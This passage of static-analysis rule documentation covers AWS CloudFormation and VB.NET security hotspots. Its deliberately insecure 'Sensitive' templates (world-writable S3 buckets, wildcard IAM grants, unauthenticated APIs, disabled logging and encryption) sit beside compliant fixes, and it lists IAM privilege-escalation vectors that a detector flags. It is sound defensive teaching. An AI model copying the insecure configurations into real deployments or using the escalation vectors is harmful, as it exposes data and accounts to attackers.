  • Compliance policies require this component to be backed up for a specific amount of time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Increase the backup retention period to an amount of time sufficient to restore service in case of an incident.

Sensitive Code Example

For Amazon Relational Database Service clusters and instances:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  relationaldatabase:
    Type: 'AWS::RDS::DBInstance'
    Properties:
      DBName: NonCompliantDatabase
      BackupRetentionPeriod: 2 # Sensitive

Compliant Solution

For Amazon Relational Database Service clusters and instances:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  relationaldatabase:
    Type: 'AWS::RDS::DBInstance'
    Properties:
      DBName: CompliantDatabase
      BackupRetentionPeriod: 5
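
For an Aurora cluster, the same property applies at the cluster level. The sketch below uses illustrative values; the engine and retention period should match your own requirements:

```yaml
AWSTemplateFormatVersion: 2010-09-09
Resources:
  DatabaseCluster:
    Type: 'AWS::RDS::DBCluster'
    Properties:
      Engine: aurora-mysql
      BackupRetentionPeriod: 7 # days; choose a duration that satisfies recovery objectives
```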

cloudformation:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant large privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PublicRead and PublicReadWrite grant "read" and "read and write" privileges, respectively, to everyone in the world (AllUsers group).
  • AuthenticatedRead grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, CSS, etc.).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, i.e., to grant users only the permissions required for their tasks. In the context of canned ACLs, set the ACL to private (the default) and, if more granularity is needed, use an appropriate S3 policy.
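
When more granularity is needed than the private canned ACL provides, a bucket policy can grant a narrow permission to a specific principal. The sketch below is illustrative only: the bucket name and the principal ARN are placeholders:

```yaml
AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3BucketPolicy:
    Type: 'AWS::S3::BucketPolicy'
    Properties:
      Bucket: "mycompliantbucket" # placeholder bucket name
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Principal:
              AWS: "arn:aws:iam::123456789012:role/website-reader" # placeholder principal
            Action: "s3:GetObject" # read-only, least privilege
            Resource: "arn:aws:s3:::mycompliantbucket/*"
```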

Sensitive Code Example

All users (i.e., anyone in the world, authenticated or not) have read and write permissions with the PublicReadWrite access control:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "mynoncompliantbucket"
      AccessControl: "PublicReadWrite"

Compliant Solution

With the private access control (the default), only the bucket owner has read/write permissions on the bucket and its ACL.

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketName: "mycompliantbucket"
      AccessControl: "Private"

See

cloudformation:S6281

By default, S3 buckets are private: only the bucket owner can access them.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies from being set on an S3 bucket, the following settings can be configured:

  • BlockPublicAcls: whether to block public ACLs from being set on the S3 bucket.
  • IgnorePublicAcls: whether to ignore existing public ACLs set on the S3 bucket.
  • BlockPublicPolicy: whether to block public policies from being set on the S3 bucket.
  • RestrictPublicBuckets: whether to restrict access to buckets with public policies to principals within the bucket owner account.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, CSS, etc.).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • BlockPublicAcls to true to block new attempts to set public ACLs.
  • IgnorePublicAcls to true to block existing public ACLs.
  • BlockPublicPolicy to true to block new attempts to set public policies.
  • RestrictPublicBuckets to true to restrict existing public policies.

Sensitive Code Example

By default, when not set, the PublicAccessBlockConfiguration is fully deactivated (nothing is blocked):

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucketdefault:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "example"

This PublicAccessBlockConfiguration allows public ACL to be set:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "example"
      PublicAccessBlockConfiguration:
        BlockPublicAcls: false # should be true
        BlockPublicPolicy: true
        IgnorePublicAcls: true
        RestrictPublicBuckets: true

Compliant Solution

This PublicAccessBlockConfiguration blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketName: "example"
      PublicAccessBlockConfiguration:
        BlockPublicAcls: true
        BlockPublicPolicy: true
        IgnorePublicAcls: true
        RestrictPublicBuckets: true

See

cloudformation:S6317

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permissions to an identity (a user, a group, or a role) are called identity-based policies. They give an identity the ability to perform a predefined set of actions on a list of resources.

Here is an example of a policy document defining a limited set of permissions that grants users the ability to manage their own access keys.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "arn:aws:iam::245500951992:user/${aws:username}",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Privilege escalation generally happens when an identity policy gives an identity the ability to grant more privileges than the ones it already has. Here is another example of a policy document that hides a privilege escalation. It allows an identity to generate a new access key for any user from the account, including users with high privileges.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "*",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Although it looks like it grants a limited set of permissions, this policy would, in practice, give the highest privileges to the identity it’s attached to.

Privilege escalation is a serious issue, as it allows a malicious user to easily escalate from a low-privilege identity they took control of to a high-privilege one.

The example above is just one of many permission escalation vectors. Here is the list of vectors that the rule can detect:

  • Create Policy Version: Create a new IAM policy and set it as default.
  • Set Default Policy Version: Set a different IAM policy version as default.
  • Create AccessKey: Create a new access key for any user.
  • Create Login Profile: Create a login profile with a password chosen by the attacker.
  • Update Login Profile: Update the existing password with one chosen by the attacker.
  • Attach User Policy: Attach a permissive IAM policy like "AdministratorAccess" to a user the attacker controls.
  • Attach Group Policy: Attach a permissive IAM policy like "AdministratorAccess" to a group containing a user the attacker controls.
  • Attach Role Policy: Attach a permissive IAM policy like "AdministratorAccess" to a role that can be assumed by the user the attacker controls.
  • Put User Policy: Alter the existing inline IAM policy of a user the attacker controls.
  • Put Group Policy: Alter the existing inline IAM policy of a group containing a user that the attacker controls.
  • Put Role Policy: Alter an existing inline IAM role policy. The role will then be assumed by the user that the attacker controls.
  • Add User to Group: Add a user that the attacker controls to a group that has a larger range of permissions.
  • Update Assume Role Policy: Update a role’s "AssumeRolePolicyDocument" to allow a user the attacker controls to assume it.
  • EC2: Create an EC2 instance that will execute with high privileges.
  • Lambda Create and Invoke: Create a Lambda function that will execute with high privileges and invoke it.
  • Lambda Create and Add Permission: Create a Lambda function that will execute with high privileges and grant permission to invoke it to a user or a service.
  • Lambda triggered with an external event: Create a Lambda function that will execute with high privileges and link it to an external event.
  • Update Lambda code: Update the code of a Lambda function executing with high privileges.
  • CloudFormation: Create a CloudFormation stack that will execute with high privileges.
  • Data Pipeline: Create a Pipeline that will execute with high privileges.
  • Glue Development Endpoint: Create a Glue Development Endpoint that will execute with high privileges.
  • Update Glue Dev Endpoint: Update the associated SSH key for the Glue endpoint.

The general recommendation to protect against privilege escalation is to restrict the resources to which sensitive permissions are granted. The first example above is a good demonstration of sensitive permissions being used with a narrow scope of resources and where no privilege escalation is possible.

Noncompliant code example

This policy allows updating the code of any Lambda function. Updating the code of a Lambda function that executes with high privileges leads to privilege escalation.

AWSTemplateFormatVersion: 2010-09-09

Resources:
  # Update Lambda code
  lambdaUpdatePolicy:
    # Noncompliant
    Type: AWS::IAM::ManagedPolicy
    Properties:
      ManagedPolicyName: lambdaUpdatePolicy
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Action:
              - lambda:UpdateFunctionCode
            Resource: "*"

Compliant solution

Narrow the policy so that it only allows updating the code of specific Lambda functions.

AWSTemplateFormatVersion: 2010-09-09

Resources:
  # Update Lambda code
  lambdaUpdatePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
      ManagedPolicyName: lambdaUpdatePolicy
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Action:
              - lambda:UpdateFunctionCode
            Resource: "arn:aws:lambda:us-east-2:123456789012:function:my-function:1"

Resources

cloudformation:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is in place, attackers can attempt attacks against the underlying API, targeting both the functionality it provides and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independent OIDC provider, integrated with the infrastructure through a Lambda authorizer.
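
The COGNITO_USER_POOLS option can be sketched in CloudFormation as follows. This is a minimal illustration, not a complete template: ExampleApi and ExampleUserPool are hypothetical resources assumed to be defined elsewhere.

```yaml
AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleAuthorizer:
    Type: AWS::ApiGateway::Authorizer
    Properties:
      Name: ExampleCognitoAuthorizer
      Type: COGNITO_USER_POOLS
      RestApiId: !Ref ExampleApi                 # hypothetical REST API resource
      IdentitySource: method.request.header.Authorization
      ProviderARNs:
        - !GetAtt ExampleUserPool.Arn            # hypothetical Cognito user pool
  ExampleMethod:
    Type: AWS::ApiGateway::Method
    Properties:
      AuthorizationType: COGNITO_USER_POOLS
      AuthorizerId: !Ref ExampleAuthorizer
      HttpMethod: GET
```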

Sensitive Code Example

A public API that doesn’t have access control implemented:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleMethod:
    Type: AWS::ApiGateway::Method
    Properties:
      AuthorizationType: NONE # Sensitive
      HttpMethod: GET

A Serverless Application Model (SAM) API resource that is public by default:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleApi: # Sensitive
    Type: AWS::Serverless::Api
    Properties:
      StageName: Prod

Compliant Solution

An API that implements AWS IAM permissions:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleMethod:
    Type: AWS::ApiGateway::Method
    Properties:
      AuthorizationType: AWS_IAM
      HttpMethod: GET

A Serverless Application Model (SAM) API resource that has to be requested using a key:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleApi:
    Type: AWS::Serverless::Api
    Properties:
      StageName: Prod
      Auth:
        ApiKeyRequired: true
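
A SAM API can likewise be restricted with a Cognito authorizer instead of an API key; a minimal sketch, assuming a hypothetical ExampleUserPool resource defined elsewhere in the template:

```yaml
AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleApi:
    Type: AWS::Serverless::Api
    Properties:
      StageName: Prod
      Auth:
        DefaultAuthorizer: ExampleCognitoAuthorizer
        Authorizers:
          ExampleCognitoAuthorizer:
            UserPoolArn: !GetAtt ExampleUserPool.Arn  # hypothetical Cognito user pool
```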

See

cloudformation:S6258

Disabling logging of this component can lead to missing traceability in case of a security incident.

Logging allows operational and security teams to get detailed and real-time feedback on an information system’s events. The logging coverage enables them to quickly react to events, ranging from the most benign bugs to the most impactful security incidents, such as intrusions.

Apart from security detection, logging capabilities also directly influence future digital forensic analyses. For example, detailed logging will allow investigators to establish a timeline of the actions perpetrated by an attacker.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require this component to be monitored.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable the logging capabilities of this component. Depending on the component, the logging storage destination might require additional permissions.
Consult the official documentation to enable logging for the impacted components. For example, AWS Application Load Balancer access logs require an additional bucket policy.
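
As an illustration of such a policy, the following sketch grants the regional Elastic Load Balancing account permission to write access logs to a log bucket. The account ID 127311923021 applies to us-east-1 and varies per region; LogBucket is a hypothetical bucket resource.

```yaml
AWSTemplateFormatVersion: 2010-09-09
Resources:
  LogBucketPolicy:
    Type: AWS::S3::BucketPolicy
    Properties:
      Bucket: !Ref LogBucket                     # hypothetical log bucket
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Principal:
              AWS: "arn:aws:iam::127311923021:root"  # ELB account for us-east-1; region-specific
            Action: "s3:PutObject"
            Resource: !Sub "${LogBucket.Arn}/AWSLogs/${AWS::AccountId}/*"
```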

Sensitive Code Example

For Amazon S3 access requests:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "mynoncompliantbucket"

For Amazon API Gateway stages:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Prod: # Sensitive
    Type: AWS::ApiGateway::Stage
    Properties:
      StageName: Prod
      Description: Prod Stage
      TracingEnabled: false # Sensitive

For Amazon Neptune clusters:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Cluster:
    Type: AWS::Neptune::DBCluster
    Properties:
      EnableCloudwatchLogsExports: []  # Sensitive

For Amazon MSK broker logs:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  SensitiveCluster:
    Type: 'AWS::MSK::Cluster'
    Properties:
      ClusterName: Sensitive Cluster
      LoggingInfo:
        BrokerLogs: # Sensitive
          CloudWatchLogs:
            Enabled: false
            LogGroup: CWLG
          Firehose:
            DeliveryStream: DS
            Enabled: false

For Amazon DocDB:

AWSTemplateFormatVersion: "2010-09-09"
Resources:
  DocDBOmittingLogs: # Sensitive
    Type: "AWS::DocDB::DBCluster"
    Properties:
      DBClusterIdentifier: "DB Without Logs"

For Amazon MQ:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Broker:
    Type: AWS::AmazonMQ::Broker
    Properties:
      Logs:  # Sensitive
        Audit: false
        General: false

For Amazon Redshift:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ClusterOmittingLogging: # Sensitive
    Type: "AWS::Redshift::Cluster"
    Properties:
      DBName: "Redshift Warehouse Cluster"

For Amazon OpenSearch service or Amazon Elasticsearch service:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  OpenSearchServiceDomain:
    Type: 'AWS::OpenSearchService::Domain'
    Properties:
      LogPublishingOptions: # Sensitive
        ES_APPLICATION_LOGS:
          CloudWatchLogsLogGroupArn: 'arn:aws:logs:us-east-1:1234:log-group:es-application-logs'
          Enabled: true
        INDEX_SLOW_LOGS:
          CloudWatchLogsLogGroupArn: 'arn:aws:logs:us-east-1:1234:log-group:es-index-slow-logs'
          Enabled: true

For Amazon CloudFront distributions:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  CloudFrontDistribution: # Sensitive
    Type: AWS::CloudFront::Distribution
    Properties:
      DistributionConfig:
        DefaultRootObject: "index.html"

For Amazon Elastic Load Balancing:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  LoadBalancer:
    Type: AWS::ElasticLoadBalancing::LoadBalancer
    Properties:
      AccessLoggingPolicy:
        Enabled: false # Sensitive

For Amazon Load Balancing (v2):

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ApplicationLoadBalancer:
    Type: AWS::ElasticLoadBalancingV2::LoadBalancer
    Properties:
      Name: SensitiveLoadBalancer
      LoadBalancerAttributes:
        - Key: "access_logs.s3.enabled"
          Value: "false" # Sensitive

Compliant Solution

For Amazon S3 access requests:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3BucketLogs:
    Type: 'AWS::S3::Bucket'
    Properties:
      BucketName: "mycompliantloggingbucket"
      AccessControl: LogDeliveryWrite

  S3Bucket:
    Type: 'AWS::S3::Bucket'
    Properties:
      BucketName: "mycompliantbucket"
      LoggingConfiguration:
        DestinationBucketName: !Ref S3BucketLogs
        LogFilePrefix: testing-logs

For Amazon API Gateway stages:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Prod:
    Type: AWS::ApiGateway::Stage
    Properties:
      StageName: Prod
      Description: Prod Stage
      TracingEnabled: true
      AccessLogSetting:
        DestinationArn: "arn:aws:logs:eu-west-1:123456789:test"
        Format: "..."

For Amazon Neptune clusters:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Cluster:
    Type: AWS::Neptune::DBCluster
    Properties:
      EnableCloudwatchLogsExports: ["audit"]

For Amazon MSK broker logs:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  SensitiveCluster:
    Type: 'AWS::MSK::Cluster'
    Properties:
      ClusterName: Sensitive Cluster
      LoggingInfo:
        BrokerLogs:
          Firehose:
            DeliveryStream: DS
            Enabled: true
          S3:
            Bucket: Broker Logs
            Enabled: true
            Prefix: "logs/msk-brokers-"

For Amazon DocDB:

AWSTemplateFormatVersion: "2010-09-09"
Resources:
  DocDBWithLogs:
    Type: "AWS::DocDB::DBCluster"
    Properties:
      DBClusterIdentifier: "DB With Logs"
      EnableCloudwatchLogsExports:
         - audit

For Amazon MQ enable Audit or General:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Broker:
    Type: AWS::AmazonMQ::Broker
    Properties:
      Logs:
        Audit: true
        General: true

For Amazon Redshift:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  CompliantCluster:
    Type: "AWS::Redshift::Cluster"
    Properties:
      DBName: "Redshift Warehouse Cluster"
      LoggingProperties:
        BucketName: "Infra Logs"
        S3KeyPrefix: "log/redshift-"

For Amazon OpenSearch service, or Amazon Elasticsearch service:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  OpenSearchServiceDomain:
    Type: 'AWS::OpenSearchService::Domain'
    Properties:
      LogPublishingOptions:
        AUDIT_LOGS:
          CloudWatchLogsLogGroupArn: 'arn:aws:logs:us-east-1:1234:log-group:es-audit-logs'
          Enabled: true

For Amazon CloudFront distributions:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  CloudFrontDistribution:
    Type: AWS::CloudFront::Distribution
    Properties:
      DistributionConfig:
        DefaultRootObject: "index.html"
        Logging:
          Bucket: "mycompliantbucket"
          Prefix: "log/cloudfront-"

For Amazon Elastic Load Balancing:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  LoadBalancer:
    Type: AWS::ElasticLoadBalancing::LoadBalancer
    Properties:
      AccessLoggingPolicy:
        Enabled: true
        S3BucketName: mycompliantbucket
        S3BucketPrefix: "log/loadbalancer-"

For Amazon Load Balancing (v2):

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ApplicationLoadBalancer:
    Type: AWS::ElasticLoadBalancingV2::LoadBalancer
    Properties:
      Name: CompliantLoadBalancer
      LoadBalancerAttributes:
        - Key: "access_logs.s3.enabled"
          Value: "true"
        - Key: "access_logs.s3.bucket"
          Value: "mycompliantbucket"
        - Key: "access_logs.s3.prefix"
          Value: "log/elbv2-"

See

cloudformation:S6319

Amazon SageMaker is a managed machine learning service in a hosted, production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information, that should not be stored unencrypted. If adversaries gain physical access to the storage media, they cannot read encrypted data without the key.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::SageMaker::NotebookInstance:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Notebook:  # Sensitive, encryption disabled by default
    Type: AWS::SageMaker::NotebookInstance

Compliant Solution

For AWS::SageMaker::NotebookInstance:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Notebook:
    Type: AWS::SageMaker::NotebookInstance
    Properties:
      KmsKeyId:
        Fn::GetAtt:
          - SomeKey
          - KeyId
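
The SomeKey resource referenced by Fn::GetAtt above is not shown by the rule; a minimal sketch of such a customer-managed key (the key policy below is a permissive illustration, not a recommendation):

```yaml
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  SomeKey:
    Type: AWS::KMS::Key
    Properties:
      Description: Key used to encrypt the SageMaker notebook instance
      KeyPolicy:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Principal:
              AWS: !Sub "arn:aws:iam::${AWS::AccountId}:root"
            Action: "kms:*"
            Resource: "*"
```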

See

cloudformation:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can store messages encrypted as soon as they are received. If adversaries gain physical access to the storage medium, or otherwise leak a message (for example through a vulnerability in the service), they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::SQS::Queue:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Queue:  # Sensitive, encryption disabled by default
    Type: AWS::SQS::Queue
    Properties:
      DisplayName: "unencrypted_queue"

Compliant Solution

For AWS::SQS::Queue:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Queue:
    Type: AWS::SQS::Queue
    Properties:
      DisplayName: "encrypted_queue"
      KmsMasterKeyId:
        Fn::GetAtt:
          - TestKey
          - KeyId
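
If a customer-managed KMS key is not required, SQS-managed server-side encryption (SSE-SQS) can be enabled instead; a sketch using the SqsManagedSseEnabled property:

```yaml
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Queue:
    Type: AWS::SQS::Queue
    Properties:
      DisplayName: "encrypted_queue"
      SqsManagedSseEnabled: true  # SQS-managed server-side encryption
```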

See

cloudformation:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data-at-rest and data-in-transit between an instance and its attached EBS storage. If adversaries gain physical access to the storage medium, they are not able to access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration: a volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For AWS::EC2::Volume:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Ec2Volume:
    Type: AWS::EC2::Volume
    Properties:
      Encrypted: false  # Sensitive
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Ec2Volume:
    Type: AWS::EC2::Volume  # Sensitive as encryption is disabled by default

Compliant Solution

For AWS::EC2::Volume:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Ec2Volume:
    Type: AWS::EC2::Volume
    Properties:
      Encrypted: true
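
To use a customer-managed key instead of the default aws/ebs key, KmsKeyId can be set as well; a sketch assuming a hypothetical SomeKey AWS::KMS::Key resource defined elsewhere in the template:

```yaml
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Ec2Volume:
    Type: AWS::EC2::Volume
    Properties:
      AvailabilityZone: us-east-1a
      Size: 10
      Encrypted: true
      KmsKeyId: !GetAtt SomeKey.Arn  # hypothetical customer-managed KMS key
```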

See

cloudformation:S6252

S3 buckets can be in three states related to versioning:

  • unversioned (the default)
  • enabled
  • suspended

When an S3 bucket is unversioned or has versioning suspended, a new version of an object overwrites the existing one in the bucket.

This can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that requires high availability.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning so that different versions of an object can be retrieved and restored.

Sensitive Code Example

Versioning is disabled by default:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "Example"

Compliant Solution

Versioning is enabled:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketName: "Example"
      VersioningConfiguration:
        Status: Enabled

See

cloudformation:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. If adversaries gain physical access to the storage medium, or otherwise leak stored files, they are not able to access the data.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::EFS::FileSystem:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Fs:  # Sensitive, encryption disabled by default
    Type: AWS::EFS::FileSystem

Compliant Solution

For AWS::EFS::FileSystem:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Fs:
    Type: AWS::EFS::FileSystem
    Properties:
      Encrypted: true

See

cloudformation:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. grant users only the permissions required for their tasks. In the context of resource-based policies, list the principals that need access and grant them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3BucketPolicy:
    Type: 'AWS::S3::BucketPolicy' # Sensitive
    Properties:
      Bucket: !Ref S3Bucket
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Principal:
              AWS: "*" # all principals / anonymous access
            Action: "s3:PutObject" # can put object
            Resource: arn:aws:s3:::mybucket/*

Compliant Solution

This policy allows only the authorized users:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3BucketPolicy:
    Type: 'AWS::S3::BucketPolicy' # Compliant
    Properties:
      Bucket: !Ref S3Bucket
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Principal:
              AWS:
                - !Sub 'arn:aws:iam::${AWS::AccountId}:root' # only this principal
            Action: "s3:PutObject" # can put object
            Resource: arn:aws:s3:::mybucket/*

See

vbnet:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers.

The .NET Core framework offers multiple features that help during debugging. Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDeveloperExceptionPage and Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDatabaseErrorPage are two of them. Make sure that those features are disabled in production.

Use If env.IsDevelopment() to disable debug code.

Sensitive Code Example

This rule raises issues when the following .NET Core methods are called: Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDeveloperExceptionPage, Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDatabaseErrorPage.

Imports Microsoft.AspNetCore.Builder
Imports Microsoft.AspNetCore.Hosting

Namespace MyMvcApp
    Public Class Startup
        Public Sub Configure(ByVal app As IApplicationBuilder, ByVal env As IHostingEnvironment)
            ' Those calls are Sensitive because it seems that they will run in production
            app.UseDeveloperExceptionPage() 'Sensitive
            app.UseDatabaseErrorPage() 'Sensitive
        End Sub
    End Class
End Namespace

Compliant Solution

Imports Microsoft.AspNetCore.Builder
Imports Microsoft.AspNetCore.Hosting

Namespace MyMvcApp
    Public Class Startup
        Public Sub Configure(ByVal app As IApplicationBuilder, ByVal env As IHostingEnvironment)
            If env.IsDevelopment() Then ' Compliant
                ' The following calls are ok because they are disabled in production
                app.UseDeveloperExceptionPage()
                app.UseDatabaseErrorPage()
            End If
        End Sub
    End Class
End Namespace

See

vbnet:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data that expands into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers compress irrelevant data (e.g. a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data; in general, the compression ratio of most legitimate archives is between 1 and 3.
  • Define and control a threshold for the maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number exceeds a predefined threshold. In particular, it’s not recommended to recursively expand archives (an archive entry can itself be an archive).

Sensitive Code Example

